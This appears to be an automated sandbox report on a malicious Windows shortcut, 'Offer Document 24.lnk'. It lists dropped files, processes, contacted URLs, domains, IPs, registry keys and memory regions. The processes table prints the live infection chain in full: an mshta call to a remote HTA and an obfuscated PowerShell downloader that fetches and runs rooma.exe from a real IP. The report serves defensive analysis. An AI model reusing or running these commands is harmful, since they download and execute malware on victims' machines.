Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Offer Document 24.lnk
|
MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=0,
ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\room4[1].hta
|
HTML document, ASCII text, with very long lines (9201), with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\rooma.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.chk
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x180ee149, page size 16384, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\F56GKLK7U4
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie
0x36, schema 4, UTF-8, version-valid-for 7
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dt5txxwm.wks.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mpkvo4uk.0pp.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ov0wzwnj.053.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xtse0ftd.ltg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1CY632ESM58YCEYJOCNT.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ee487d0d1c422de2.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 6 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'http://20.86.128.223/room/room4.hta'
|
|
|
|
C:\Windows\System32\mshta.exe
|
"C:\Windows\System32\mshta.exe" http://20.86.128.223/room/room4.hta
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ,
$bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe
$iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted
-File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process
$iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol
= [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function
KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return
$PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path
-Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh
$fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;
|
|
|
|
C:\Users\user\AppData\Roaming\rooma.exe
|
"C:\Users\user\AppData\Roaming\rooma.exe"
|
|
|
|
C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
|
"C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe"
|
|
|
|
C:\Windows\SysWOW64\netbtugc.exe
|
"C:\Windows\SysWOW64\netbtugc.exe"
|
|
|
|
C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
|
"C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe"
|
|
|
|
C:\Program Files\Mozilla Firefox\firefox.exe
|
"C:\Program Files\Mozilla Firefox\Firefox.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
There are 1 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://20.86.128.22
|
unknown
|
|
|
|
http://20.86.12
|
unknown
|
|
|
|
http://20.86.128.223/
|
unknown
|
|
|
|
http://20.86.128.
|
unknown
|
|
|
|
http://20.86.128.223
|
unknown
|
|
|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://20.8
|
unknown
|
|
|
|
http://20.86.
|
unknown
|
|
|
|
http://20.86.128.223/room/rooma.exe
|
20.86.128.223
|
|
|
|
http://20.86.128.223/room
|
unknown
|
|
|
|
http://20.86
|
unknown
|
|
|
|
http://20.86.1
|
unknown
|
|
|
|
http://20.86.128.223/ro
|
unknown
|
|
|
|
http://20.86.128.223/room/roo
|
unknown
|
|
|
|
http://20.86.128.223/room/ro
|
unknown
|
|
|
|
http://20.86.128.2
|
unknown
|
|
|
|
http://20.86.128.223/room/
|
unknown
|
|
|
|
http://20.86.128.223/room/room
|
unknown
|
|
|
|
http://20.86.128.223/room/room4.hta
|
20.86.128.223
|
|
|
|
http://20.86.128.223/r
|
unknown
|
|
|
|
http://20.86.128.223/room/r
|
unknown
|
|
|
|
http://20.86.128
|
unknown
|
|
|
|
http://20.86.128.223/roo
|
unknown
|
|
|
|
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
|
http://20.86.1H2
|
unknown
|
||
|
https://duckduckgo.com/ac/?q=
|
unknown
|
||
|
https://www.empowermedeco.com/fo8o/?Plm0mn68=mxnR
|
unknown
|
||
|
https://go.microsoft.co9
|
unknown
|
||
|
http://www.donnavariedades.com/fo8o/?Plm0mn68=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pFBqtQGck9fp1rRtCXud2beKokCA0CIPwH0kByjXVEoJ79g==&kzN4Y=k0xDPL
|
23.227.38.74
|
||
|
http://20.86.128.223/room/room4.htaFPS_BROWSER_AP
|
unknown
|
||
|
https://musee.mobi/vivaldi/fo8o/?Plm0mn68=PTl5gU/3CD/Xhg5Nd1HWi
|
unknown
|
||
|
http://20.86.128.223/room/room4.hta8N
|
unknown
|
||
|
http://www.3xfootball.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1aOjYc66J7Y/iHKqqtd6zR7stgJ4hm8X7oMbvduFmUyU2g==
|
154.215.72.110
|
||
|
http://www.kasegitai.tokyo/fo8o/?Plm0mn68=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8r+KEwUMhhIOLRL5gTEM7bFlULXRyxxVa+trARU9e5ZGGZA==&kzN4Y=k0xDPL
|
202.172.28.202
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://www.magmadokum.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKEsqfuFkq5cAQSWi7WA8E0wwXs8UZjiSCj3RZ8cyRYh4cA==
|
85.159.66.93
|
||
|
http://20.86.128.223/room/room4.hta...H2
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://20.86.128.223/room/rooma.e
|
unknown
|
||
|
http://20.86.128.223/room/room4.htaLMEMH
|
unknown
|
||
|
https://musee.mobi/vivaldi/fo8o/?Plm0mn68=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://www.joyesi.xyz/fo8o/
|
185.237.107.49
|
||
|
http://www.antonio-vivaldi.mobi/fo8o/
|
46.30.213.191
|
||
|
http://20.86.128.223/room/room4.htaY
|
unknown
|
||
|
https://www.goldenjade-travel.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLta
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://www.elettrosistemista.zip/fo8o/?kzN4Y=k0xDPL&Plm0mn68=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLyJvXbOnx1XXjd4sQOb9JZJsSiXIk2nToiXJsgHURydTcQ==
|
195.110.124.133
|
||
|
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
|
http://www.goldenjade-travel.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2yArpDgvi6oTdq6vPucKXgoaIsT3InbTvvq+zcnCyLgXuQ==
|
116.50.37.244
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2/C:
|
unknown
|
||
|
https://www.ecosia.org/newtab/
|
unknown
|
||
|
http://20.86.128.223/room/room4.htao
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://codepen.io/uzcho_/pens/popular/?grid_type=list
|
unknown
|
||
|
http://20.86.128.223/room/room4.htat
|
unknown
|
||
|
https://codepen.io/uzcho_/pen/eYdmdXw.css
|
unknown
|
||
|
http://www.rssnewscast.com/fo8o/?Plm0mn68=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNup0fu2K1aHG/1RRjejs3ag7ONVYGhhFLwGMDRFljOPFYJw==&kzN4Y=k0xDPL
|
91.195.240.94
|
||
|
http://20.86.128.223/room/rooma.exep
|
unknown
|
||
|
http://www.empowermedeco.com/fo8o/
|
217.196.55.202
|
||
|
http://20.86.128.223/room/rooma.
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://www.empowermedeco.com/fo8o/?Plm0mn68=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfAZWzpPAGosIZrfQfUSvJErRFr5z6zwQDc//Mk8r+NzcRQ==&kzN4Y=k0xDPL
|
217.196.55.202
|
||
|
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
|
http://20.86.128.223/room/room4.hta$
|
unknown
|
||
|
http://www.660danm.top/fo8o/
|
34.111.148.214
|
||
|
http://www.magmadokum.com/fo8o/
|
85.159.66.93
|
||
|
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
|
unknown
|
||
|
http://www.rssnewscast.com/fo8o/
|
91.195.240.94
|
||
|
http://www.660danm.top/fo8o/?kzN4Y=k0xDPL&Plm0mn68=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrOfHwa9C8Q+9ZQoBQJyEcpoFJdl2tDobRnKnc0fEkX8JY0Q==
|
34.111.148.214
|
||
|
http://www.kasegitai.tokyo/fo8o/
|
202.172.28.202
|
||
|
http://20.86.128.223/room/room4.htaventindowsINetCookiesIO
|
unknown
|
||
|
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
http://20.86.128.223/room/room4.htaH
|
unknown
|
||
|
http://www.joyesi.xyz
|
unknown
|
||
|
http://20.86.128.223/room/room4.hta....=H
|
unknown
|
||
|
http://www.goldenjade-travel.com/fo8o/
|
116.50.37.244
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
|
unknown
|
||
|
https://www.goldenjade-travel.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prI
|
unknown
|
||
|
http://20.86.128.223/room/rooma
|
unknown
|
||
|
http://www.elettrosistemista.zip/fo8o/
|
195.110.124.133
|
||
|
http://www.antonio-vivaldi.mobi/fo8o/?Plm0mn68=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZdmVZ54UmbyKF16zvv1yGe3hSwRWBn0bZic9A2kho+UJ9gA==&kzN4Y=k0xDPL
|
46.30.213.191
|
||
|
http://www.donnavariedades.com/fo8o/
|
23.227.38.74
|
||
|
https://www.sedo.com/services/parking.php3
|
unknown
|
||
|
https://ac.ecosia.org/autocomplete?q=
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod/C:
|
unknown
|
||
|
http://www.joyesi.xyz/fo8o/?kzN4Y=k0xDPL&Plm0mn68=4jpq/azRsxa5RUjY86tNWfjSBjUfGmQA/bC5edk8IUrTRSqWoRPa/8wzulAZuqVnvDzKNkDL1IzsWztH+C0vz/DDu79arRp32UcJsNkv7g6dr0ICiHZvS3tESvUt5oYRbw==
|
185.237.107.49
|
||
|
https://donnavariedades.com/fo8o?Plm0mn68=l
|
unknown
|
||
|
http://20.86.128.223/room/room4.htaC:
|
unknown
|
||
|
http://20.86.128.223/room/rooma.ex
|
unknown
|
||
|
http://20.86.128.223/room/room4.htastricted
|
unknown
|
||
|
http://20.86.128.223/room/room4.hta4.C:
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
||
|
http://www.techchains.info/fo8o/
|
66.29.149.46
|
||
|
http://20.86.128.223/room/room4.hta;H
|
unknown
|
There are 90 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
www.joyesi.xyz
|
185.237.107.49
|
|
|
|
www.magmadokum.com
|
unknown
|
|
|
|
www.donnavariedades.com
|
unknown
|
|
|
|
www.liangyuen528.com
|
unknown
|
|
|
|
www.empowermedeco.com
|
unknown
|
|
|
|
www.k9vyp11no3.cfd
|
unknown
|
|
|
|
www.elettrosistemista.zip
|
unknown
|
|
|
|
www.660danm.top
|
34.111.148.214
|
||
|
empowermedeco.com
|
217.196.55.202
|
||
|
shops.myshopify.com
|
23.227.38.74
|
||
|
natroredirect.natrocdn.com
|
85.159.66.93
|
||
|
www.kasegitai.tokyo
|
202.172.28.202
|
||
|
elettrosistemista.zip
|
195.110.124.133
|
||
|
www.3xfootball.com
|
154.215.72.110
|
||
|
www.shenzhoucui.com
|
104.206.198.212
|
||
|
www.antonio-vivaldi.mobi
|
46.30.213.191
|
||
|
www.goldenjade-travel.com
|
116.50.37.244
|
||
|
www.rssnewscast.com
|
91.195.240.94
|
||
|
www.techchains.info
|
66.29.149.46
|
There are 9 hidden domains, click here to show them.
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
185.237.107.49
|
www.joyesi.xyz
|
Ukraine
|
|
|
|
20.86.128.223
|
unknown
|
United States
|
|
|
|
91.195.240.94
|
www.rssnewscast.com
|
Germany
|
||
|
34.111.148.214
|
www.660danm.top
|
United States
|
||
|
116.50.37.244
|
www.goldenjade-travel.com
|
Taiwan; Republic of China (ROC)
|
||
|
23.227.38.74
|
shops.myshopify.com
|
Canada
|
||
|
85.159.66.93
|
natroredirect.natrocdn.com
|
Turkey
|
||
|
202.172.28.202
|
www.kasegitai.tokyo
|
Japan
|
||
|
66.29.149.46
|
www.techchains.info
|
United States
|
||
|
154.215.72.110
|
www.3xfootball.com
|
Seychelles
|
||
|
195.110.124.133
|
elettrosistemista.zip
|
Italy
|
||
|
127.0.0.1
|
unknown
|
unknown
|
||
|
46.30.213.191
|
www.antonio-vivaldi.mobi
|
Denmark
|
||
|
217.196.55.202
|
empowermedeco.com
|
Norway
|
There are 4 hidden IPs, click here to show them.
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2550000
|
system
|
page execute and read and write
|
|
|
|
2C10000
|
trusted library allocation
|
page read and write
|
|
|
|
9B1000
|
unkown
|
page execute and read and write
|
|
|
|
14C0000
|
unclassified section
|
page execute and read and write
|
|
|
|
3800000
|
unclassified section
|
page execute and read and write
|
|
|
|
2C50000
|
trusted library allocation
|
page read and write
|
|
|
|
23A0000
|
system
|
page execute and read and write
|
|
|
|
47F0000
|
unkown
|
page execute and read and write
|
|
|
|
24A03190000
|
trusted library allocation
|
page read and write
|
||
|
23FE3C3F000
|
heap
|
page read and write
|
||
|
787D000
|
heap
|
page read and write
|
||
|
24A03B02000
|
heap
|
page read and write
|
||
|
2E2F000
|
heap
|
page read and write
|
||
|
7FFE000
|
stack
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE3DE7000
|
heap
|
page read and write
|
||
|
21E64339000
|
trusted library allocation
|
page read and write
|
||
|
23FE4585000
|
heap
|
page read and write
|
||
|
237E138C000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE449A000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
237E1384000
|
heap
|
page read and write
|
||
|
23FE3DC0000
|
heap
|
page read and write
|
||
|
21E62420000
|
heap
|
page readonly
|
||
|
93E000
|
unkown
|
page readonly
|
||
|
700000
|
unkown
|
page readonly
|
||
|
21E7C620000
|
heap
|
page execute and read and write
|
||
|
78B8000
|
heap
|
page read and write
|
||
|
101D000
|
heap
|
page read and write
|
||
|
23FE3C39000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
237E2BD0000
|
heap
|
page read and write
|
||
|
23FE449F000
|
heap
|
page read and write
|
||
|
7FFB4A1AC000
|
trusted library allocation
|
page execute and read and write
|
||
|
23FE44D1000
|
heap
|
page read and write
|
||
|
FB87EFB000
|
stack
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
24A08904000
|
heap
|
page read and write
|
||
|
23FE4479000
|
heap
|
page read and write
|
||
|
23FE438E000
|
heap
|
page read and write
|
||
|
23FE44A8000
|
heap
|
page read and write
|
||
|
9CE000
|
stack
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
11E4000
|
heap
|
page read and write
|
||
|
23FE3E6E000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
21E623F0000
|
trusted library allocation
|
page read and write
|
||
|
23FE456A000
|
heap
|
page read and write
|
||
|
24A03300000
|
heap
|
page read and write
|
||
|
23FE451E000
|
heap
|
page read and write
|
||
|
237E1230000
|
trusted library allocation
|
page read and write
|
||
|
24A08CB0000
|
trusted library allocation
|
page read and write
|
||
|
28F0000
|
heap
|
page read and write
|
||
|
120000
|
unkown
|
page readonly
|
||
|
23FE3DE7000
|
heap
|
page read and write
|
||
|
7FFB4A16B000
|
trusted library allocation
|
page read and write
|
||
|
13C0000
|
unkown
|
page readonly
|
||
|
A2BA6FE000
|
stack
|
page read and write
|
||
|
237E1387000
|
heap
|
page read and write
|
||
|
85F000
|
stack
|
page read and write
|
||
|
FB876FE000
|
stack
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE438E000
|
heap
|
page read and write
|
||
|
25D0000
|
heap
|
page read and write
|
||
|
3966000
|
unkown
|
page read and write
|
||
|
2417F401000
|
trusted library allocation
|
page read and write
|
||
|
21E64568000
|
trusted library allocation
|
page read and write
|
||
|
5DD0000
|
trusted library allocation
|
page read and write
|
||
|
2417EBEB000
|
heap
|
page read and write
|
||
|
93E000
|
unkown
|
page readonly
|
||
|
24A03A00000
|
heap
|
page read and write
|
||
|
23FE3DCE000
|
heap
|
page read and write
|
||
|
283E000
|
stack
|
page read and write
|
||
|
2880000
|
heap
|
page read and write
|
||
|
288E000
|
heap
|
page read and write
|
||
|
63F000
|
heap
|
page read and write
|
||
|
23FE3C89000
|
heap
|
page read and write
|
||
|
23FE456C000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
21FF000
|
stack
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
CF1000
|
unkown
|
page readonly
|
||
|
24A088FE000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
24A08754000
|
trusted library allocation
|
page read and write
|
||
|
23FE4568000
|
heap
|
page read and write
|
||
|
2931000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
13AE000
|
heap
|
page read and write
|
||
|
16FE000
|
direct allocation
|
page execute and read and write
|
||
|
24A03317000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
24A08740000
|
trusted library allocation
|
page read and write
|
||
|
23FE3C77000
|
heap
|
page read and write
|
||
|
23FE2F37000
|
heap
|
page read and write
|
||
|
FB892FE000
|
unkown
|
page readonly
|
||
|
23FE3C39000
|
heap
|
page read and write
|
||
|
24A08842000
|
heap
|
page read and write
|
||
|
24DB000
|
stack
|
page read and write
|
||
|
2417EB01000
|
system
|
page execute and read and write
|
||
|
21E62270000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
2461000
|
system
|
page execute and read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE457D000
|
heap
|
page read and write
|
||
|
23FE3C7F000
|
heap
|
page read and write
|
||
|
24A08902000
|
heap
|
page read and write
|
||
|
23FE44D5000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
24A0882C000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
78FF000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
7844000
|
heap
|
page read and write
|
||
|
7DF46A8A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
23FE4326000
|
heap
|
page read and write
|
||
|
24A03213000
|
heap
|
page read and write
|
||
|
23FE4345000
|
heap
|
page read and write
|
||
|
23FE3DBE000
|
heap
|
page read and write
|
||
|
93E000
|
unkown
|
page readonly
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
23FE43A9000
|
heap
|
page read and write
|
||
|
23FE4566000
|
heap
|
page read and write
|
||
|
23FE456C000
|
heap
|
page read and write
|
||
|
1E0000
|
unkown
|
page readonly
|
||
|
7FFB4A350000
|
trusted library allocation
|
page read and write
|
||
|
23FE4575000
|
heap
|
page read and write
|
||
|
21E62476000
|
heap
|
page read and write
|
||
|
23FE4566000
|
heap
|
page read and write
|
||
|
23FE4413000
|
heap
|
page read and write
|
||
|
23FE4568000
|
heap
|
page read and write
|
||
|
23FE4409000
|
heap
|
page read and write
|
||
|
7FFB4A410000
|
trusted library allocation
|
page read and write
|
||
|
23FE4512000
|
heap
|
page read and write
|
||
|
23FE3C16000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
1024000
|
heap
|
page read and write
|
||
|
23FE3C14000
|
heap
|
page read and write
|
||
|
2417F300000
|
trusted library allocation
|
page read and write
|
||
|
24A03B1A000
|
heap
|
page read and write
|
||
|
23FE8894000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
21E63FC8000
|
heap
|
page read and write
|
||
|
920000
|
unkown
|
page read and write
|
||
|
23FE456C000
|
heap
|
page read and write
|
||
|
23FE449F000
|
heap
|
page read and write
|
||
|
2E33000
|
heap
|
page read and write
|
||
|
23FE3C80000
|
heap
|
page read and write
|
||
|
304E000
|
direct allocation
|
page execute and read and write
|
||
|
23FE44AF000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
7FFB4A450000
|
trusted library allocation
|
page read and write
|
||
|
1560000
|
direct allocation
|
page execute and read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
24A08892000
|
heap
|
page read and write
|
||
|
23FE44AF000
|
heap
|
page read and write
|
||
|
2B11000
|
heap
|
page read and write
|
||
|
7FFB4A3C0000
|
trusted library allocation
|
page read and write
|
||
|
23FE3E6C000
|
heap
|
page read and write
|
||
|
7FFB4A152000
|
trusted library allocation
|
page read and write
|
||
|
2FD9000
|
direct allocation
|
page execute and read and write
|
||
|
BCFE0BE000
|
stack
|
page read and write
|
||
|
237E1315000
|
heap
|
page read and write
|
||
|
7FFB4A3F0000
|
trusted library allocation
|
page read and write
|
||
|
23FE4568000
|
heap
|
page read and write
|
||
|
BCFEC0E000
|
stack
|
page read and write
|
||
|
23FE4568000
|
heap
|
page read and write
|
||
|
2CD6000
|
